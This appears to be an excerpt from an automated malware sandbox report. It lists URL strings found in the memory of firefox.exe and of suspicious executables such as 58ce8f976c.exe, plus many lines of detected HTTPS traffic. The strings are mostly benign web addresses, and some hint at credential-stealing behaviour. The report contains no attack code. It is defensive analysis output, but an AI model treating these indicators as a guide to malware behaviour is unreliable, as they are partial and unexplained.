Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://twitter.com
Source: firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: file.exe, 00000000.00000003.2214880868.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2926473817.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: firefox.exe, 0000001A.00000002.3254465653.0000019E4BC13000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3086228555.0000019E4B852000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3084909437.0000019E4B600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3085359079.0000019E4B80F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=utf-8&mode=blended&tag=mozill
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: file.exe, 00000000.00000003.2174370045.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896261286.0000000005958000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896136861.000000000596F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051709799.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056682924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051343446.000000000601D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 0000001A.00000002.3247984693.0000019E4B65C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000001A.00000002.3276626657.0000019E4CD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3114034660.0000019E53E92000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3145093267.0000019E53DAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001A.00000002.3230691472.0000019E47D8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3086228555.0000019E4B852000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3084909437.0000019E4B600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3085359079.0000019E4B80F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.2174370045.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896261286.0000000005958000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896136861.000000000596F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051709799.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056682924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051343446.000000000601D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://www.google.com/policies/privacy/2
Source: firefox.exe, 0000001A.00000002.3276626657.0000019E4CD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3086228555.0000019E4B852000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3084909437.0000019E4B600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3085359079.0000019E4B80F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: file.exe, 00000000.00000003.2198542260.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2925963340.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3088747282.000000000600F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.or
Source: firefox.exe, 0000001A.00000002.3230691472.0000019E47D8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3218314542.00000045F65BC000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp, firefox.exe, 0000001A.00000003.3148359277.0000019E53B5C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3224109770.0000019E3B86B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: 58ce8f976c.exe, 0000000C.00000003.3089311175.00000000060F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: firefox.exe, 0000001A.00000003.3185200055.0000019E4CF66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3213102299.0000019E4CF70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3191592344.0000019E4CF7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: 58ce8f976c.exe, 0000000C.00000003.3089311175.00000000060F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: 58ce8f976c.exe, 0000000C.00000003.3089311175.00000000060F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp, firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/resource:///modules/UrlbarPrefs.sys.mjsresource:///modules/Urlba
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 0000001A.00000002.3227788063.0000019E47051000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: firefox.exe, 0000001A.00000002.3218314542.00000045F65BC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3228922756.0000019E471AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://www.openh264.org//
Source: firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: file.exe, 00000000.00000003.2214880868.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/ce
Source: 58ce8f976c.exe, 0000000A.00000003.2926473817.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://www.widevine.com/3
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C266000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://yandex.com
Source: firefox.exe, 0000001A.00000002.3230691472.0000019E47D8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3165170400.0000019E4E025000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3276626657.0000019E4CD44000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3230691472.0000019E47D15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001A.00000003.3165170400.0000019E4E042000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 0000001A.00000002.3227788063.0000019E47039000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3224109770.0000019E3B86B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000018.00000002.3068054846.000001E80615F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3075536770.000001C6A6E09000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3223563743.0000019E3B669000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdBoolean
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmatch
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/accountincrementModificationCountstrippedUrlToTopPrefixAndTitlesuggestedIndexRes
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49999
